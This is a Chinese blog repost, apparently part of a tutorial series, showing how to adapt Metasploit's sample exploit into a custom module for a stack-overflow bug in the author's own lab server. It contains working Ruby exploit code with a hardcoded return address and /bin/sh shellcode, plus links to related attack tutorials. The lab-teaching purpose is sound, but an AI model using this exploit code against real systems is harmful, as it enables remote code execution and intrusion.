使用metasploit进行栈溢出攻击-4

最新推荐文章于 2021-01-25 16:21:43 发布
最新推荐文章于 2021-01-25 16:21:43 发布
阅读量149 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 网络 数据库
原文链接:http://www.cnblogs.com/baizx/p/4114811.html
本文详细介绍了如何使用Metasploit框架创建针对特定漏洞的自定义利用模块,并将其添加到框架中。通过创建、修改、添加自定义模块,实现了对特定漏洞的利用过程。最后,通过验证和应用该模块,展示了如何将其整合到Metasploit环境中进行实际操作。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

有了漏洞我们就可以进行攻击了。首先我们需要了解metasploit的exploit模块,具体可以看

http://www.offensive-security.com/metasploit-unleashed/Exploit_Development

metasploit本身功能非常强大,这里不多做介绍。

首先我们需要添加一个针对这个漏洞的exploit模块,

我们直接在样例上进行修改:

root@bt:~/.msf4/modules# mkdir exploits
root@bt:~/.msf4/modules# cd exploits
root@bt:~/.msf4/modules/exploits# mkdir linux
root@bt:~/.msf4/modules/exploits/linux# cp /pentest/exploits/framework/documentation/samples/modules/exploits/sample.rb  myvictim.rb
root@bt:~/.msf4/modules/exploits/linux# ls
myvictim.rb  myvictimserver.rb  proftp_sreplace.rb

然后查看myvictim.rb

##
# $Id: sample.rb 9212 2010-05-03 17:13:09Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

module Msf

###
#
# This exploit sample shows how an exploit module could be written to exploit
# a bug in an arbitrary TCP server.
#
###
class Exploits::Sample < Msf::Exploit::Remote

        #
        # This exploit affects TCP servers, so we use the TCP client mixin.
        #
        include Exploit::Remote::Tcp

        def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'Sample exploit',
                        'Description'    => %q{
                                        This exploit module illustrates how a vu
lnerability could be exploited
                                in an TCP server that has a parsing bug.
                        },
                        'Author'         => 'skape',
                        'Version'        => '$Revision: 9212 $',
                        'References'     =>
                                [
                                ],
                        'Payload'        =>
                                {
                                        'Space'    => 1000,
                                        'BadChars' => "\x00",
                                },
                        'Targets'        =>
                                [
                                        # Target 0: Windows All
                                        [
                                                'Windows Universal',
                                                {
                                                        'Platform' => 'win',
                                                        'Ret'      => 0x41424344
                                                }
                                        ],
                                ],
                        'DefaultTarget' => 0))
        end

        #
        # The sample exploit just indicates that the remote host is always
        # vulnerable.
        #
        def check
                return Exploit::CheckCode::Vulnerable
        end

        #
        # The exploit method connects to the remote service and sends 1024 A's
        # followed by the fake return address and then the payload.
        #
        def exploit
                connect

                print_status("Sending #{payload.encoded.length} byte payload..."
)

                # Build the buffer for transmission
                buf  = "A" * 1024
                buf += [ target.ret ].pack('V')
                buf += payload.encoded

                # Send it off
                sock.put(buf)
                sock.get

                handler
        end

end

end

然后我们需要把他添加进metasploit,运行reload_all


=[ metasploit v4.0.0-release [core:4.0 api:1.0]
+ -- --=[ 719 exploits - 361 auxiliary - 68 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
=[ svn r13462 updated 1208 days ago (2011.08.01)

Warning: This copy of the Metasploit Framework was last updated 1208 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306

msf > reload_all

msf > use exploit/linux/my
use exploit/linux/mysql/mysql_yassl_getname use exploit/linux/myvictimserver
use exploit/linux/mysql/mysql_yassl_hello
msf > use exploit/linux/my

这里并没有列出来我们刚刚添加的模块,说明模块有问题,必须修改,修改如下:

##
# $Id: myvictimserver.rb 9212 2014-11-03 17:13:09Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'



###
#
# This exploit sample shows how an exploit module could be written to exploit
# a bug in an arbitrary TCP server.
#
###
class Metasploit3 < Msf::Exploit::Remote
    Rank = GreatRanking
    #
    # This exploit affects TCP servers, so we use the TCP client mixin.
    #
    include Exploit::Remote::Tcp

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'MyVictimSever',
            'Description'    => %q{
                    This exploit module illustrates how a vulnerability could be exploited
                in an TCP server that has a stackoverflow bug.
            },
            'Author'         => 'bai',
            'Version'        => '$Revision: 9212 $',
            'References'     =>
                [
                ],
            'Payload'        =>
                {
                    'Space'    => 116, #
                    'BadChars' => "\x00",
                },
            'Targets'        =>
                [
                    # Target 0: Windows All
                    [
                        'MyVictimSever run on linux',
                        {
                            'Platform' => 'Linux',
                            'Ret'      =>  0xbffff4a4
                        }
                    ],
                ],
            'DefaultTarget' => 0))
    end

    #
    # The sample exploit just indicates that the remote host is always
    # vulnerable.
    #
    def check
        return Exploit::CheckCode::Vulnerable
    end

    #
    # The exploit method connects to the remote service and sends 1024 A's
    # followed by the fake return address and then the payload.
    #
    def exploit
        connect

        print_status("Sending #{payload.encoded.length} byte payload...")

        # Build the buffer for transmission
        buf="";
        #buf  = "\x90" * 15
        #buf+="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 
        #buf+="\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" 
        #buf+="\x80\xe8\xdc\xff\xff\xff/bin/sh";
        buf+="\xa4\xf4\xff\xbf"
        buf += payload.encoded
        buf += [].fill( target.ret,0,100).pack('V*')

        # Send it off
        sock.put(buf)
        sock.get

        handler
    end

end

这时候,我们就可以找到这个模块了。

msf > use exploit/linux/my
use exploit/linux/mysql/mysql_yassl_getname  use exploit/linux/myvictim
use exploit/linux/mysql/mysql_yassl_hello    use exploit/linux/myvictimserver
msf > use exploit/linux/my

 

转载于:https://www.cnblogs.com/baizx/p/4114811.html

13、漏洞利用开发全解析:从栈溢出Metasploit框架应用
android的专栏
08-13 6
本文深入解析了信息安全领域中的漏洞利用开发技术,涵盖栈溢出、堆破坏、整数运算漏洞等常见类型,并通过UW POP2服务器的栈溢出示例详细讲解漏洞利用代码的编写。同时,文章介绍了Metasploit框架的使用方法,以IIS 4.0 HTR缓冲区溢出漏洞为例,演示如何利用Metasploit进行漏洞攻击开发。文章还总结了不同类型漏洞的利用特点,推荐了相关学习资源,并展望了漏洞利用开发的未来趋势,为安全研究人员和开发人员提供了全面的技术参考。
[网络安全自学篇] 五十四.Windows系统安全之基于SEH异常处理机制的栈溢出攻击及防御解析
杨秀璋的专栏
03-02 8777
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记。前文分享了XP和Kali环境搭建,通过Windows漏洞实现栈溢出攻击,通过Metasploit反弹shell,从而Kali系统获取了XP系统的shell。本文将讲解基于SEH异常处理机制的栈溢出漏洞,XP系统通过连接Easy File Sharing Web Server 7.2文件传输服务,然后利用一个恶意的请求头部(HEAD或GET)引起缓冲区溢出,从而改写SEH链的地址并反弹Shell。基础性文章,希望对您有所帮助。
htmlCss-----Day4(列表、溢出处理)
weixin_45170547的博客
11-06 246
列表 有序列表 0l reversed 规定列表顺序为降序 start 规定有序列表的起始值 type 规定列表使用的标记类型 无序列表 type 规定列表使用的标记类型
解决 Metasploit 启动及使用过程中一直出现警告信息的问题
0pr
04-30 2956
问题描述 运行 msfconsole,即报如下警告信息: ➜ recon msfconsole /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract_adapter.rb:84: warni...
Metasploit+Framework:黑掉整个星球
08-14
Metasploit+Framework:黑掉整个星球
msf 溢出mysql mssql_使用metasploit进行栈溢出攻击-4
weixin_31412915的博客
01-20 200
=[ metasploit v4.0.0-release [core:4.0 api:1.0]+ -- --=[ 719 exploits - 361 auxiliary - 68 post+ -- --=[ 226 payloads - 27 encoders - 8 nops=[ svn r13462 updated 1208 days ago (2011.08.01)Warning: Thi...
metasploit更新后msfconsole报错的解决方法
折耳根的羹
01-25 5402
Unable to find a spec satisfying metasploit-framework (>= 0) in the set. Perhaps the lockfile is corrupted? Run `bundle install` to install missing gems. 报错如下: Unable to find a spec satisfying metasploit-framework (>= 0) in the set. Perhaps th..
53.Windows漏洞利用之Metasploit实现栈溢出攻击及反弹shell1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。前文学习:[网络
信息系统安全实验(十):使用Metasploit渗透攻击MS08-067(Windows Server 2003 SP0)、Samba(Ubuntu 8.04
agjirowjtg的博客
02-01 3618
这是信息系统安全实验系列的第十篇~ 一、实验概述 1.   实验目的        学习渗透测试(penetration)的相关知识,包括渗透测试的方法及其过程。学习Metasploit的基本知识,了解其基本的架构,并且能使用其基本的功能对靶机的已知漏洞进行利用。 2.   实验环境        Kali Linux以及其他靶机环境 3.   工具介绍        Metaspl...
Metasploit实战:Windows栈溢出攻击与反弹shell教程
本文是一篇关于网络安全的Windows漏洞利用教程,主要讲解了如何利用Metasploit框架进行栈溢出攻击和实现反弹shell,目标是Windows XP系统。作者在文章中分享了其自学过程中的实践操作,强调了合法学习和安全意识的...
模糊测试漏洞挖掘
lishenglong666的专栏
01-15 3286
原文http://seckungfu.com/blog/2012/11/20/lou-dong-wa-jue-shou-ji-zhi-monajian-jie/ 相关网站 http://www.twisc.nctu.edu.tw/ http://140.113.87.234:8000/lan mona是著名的corelan team出品的immunity debugger插件,漏
metasploit 中文系统安装失败问题
weixin_34245169的博客
01-18 142
windows中文系统在安装metasploit时会报postgresql错误,这是由于postgresql对中文支持问题导致。 解决方法:控制面板-区域和语言选项-将标准与格式,改为英语(美国),在安装即可 或可以安装metasploit framework的mini版,该版本不安装postgresql自然也无上述错误了。但无法使用GUI界面和一些相关功能 ...
Metasploit使用Hash直接登录Windows
jackey3Lin的专栏
10-21 2511
首先,在本地主机(假设为目标主机) 新建一个isosky用户,并为之设置密码,然后通过gethashes.exe获取到HASH C:\>net user isosky test The command completed successfully. C:\>gethashes.exe $local 1:1007:C2265B23734E0DACAAD3B435B51404
简单测试使用msf发布poc
huobengle
12-15 661
看个存在漏洞的代码 #include &lt;IOSTREAM.H&gt; #include &lt;WINSOCK2.H&gt; #pragma comment(lib,"ws2_32.lib") VOID msg_display(char *buf) { char msg[200]; strcpy(msg,buf); cout&lt;&lt;"*************...
Metasploit详解 详细图文教程
u012558785的专栏
10-07 6939
Metasploit详解 详细图文教程   2013-05-25 00:58:02|  分类: 工具 |  标签: |举报 |字号大中小 订阅 一、metasploit简介     Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具,因此安全工作人员常用Metasploit工具来检测系统的安全性。Metas
Kali--渗透攻击Mysql数据库服务
齐泽文的Blog
04-12 1万+
Mysql是个关系型数据库管理系统,由瑞典Mysql AB开发,目前属于Oracle公司,在Metasploitable系统中,Mysql的身份认证存在漏洞,这个漏洞可以让攻击者不必提供正确的身份证书便可访问Mysql数据库。本教程将介绍使用Metasploit的Mysql扫描模块渗透攻击Mysql数据库服务。(1)启动MSFCONSOLE。root@kali:~#msfconsole(2)扫描所...
Metasploit利用MS17-010漏洞
江左盟的博客
05-25 2万+
端口扫描 使用nmap扫描主机及开放的端口:nmap -sS 192.168.1.* Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-25 15:06 CST Nmap scan report for cvr328w (192.168.1.1) Host is up (0.00049s latency). Not shown: 998 cl...
关于metasploit的一些架构目录
热门推荐
悟世之路
10-08 2万+
metasploit的框架目录,位置在 /usr/share/
Metasploit入侵win7系统
weixin_45092418的博客
06-18 2333
Metasploit入侵win7系统一:实验环境二:获得信息a.获得网络拓扑图b.获得主机ip和目标ip三:实施入侵a.打开控制终端b.查找漏洞c.进行配置四:对主机进行操作五:做个守法的好青年 一:实验环境 主机:安装有Metasploit的kali linux 操作系统 目标:已关闭防火墙的win7系统 二:获得信息 a.获得网络拓扑图 画出网络拓扑图,确定你和目标主机在同一局域网下。 b.获得主机ip和目标ip 1.主机ip:ifconifg 这里的eth0是你有线连接的ip地址,也是lhost。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值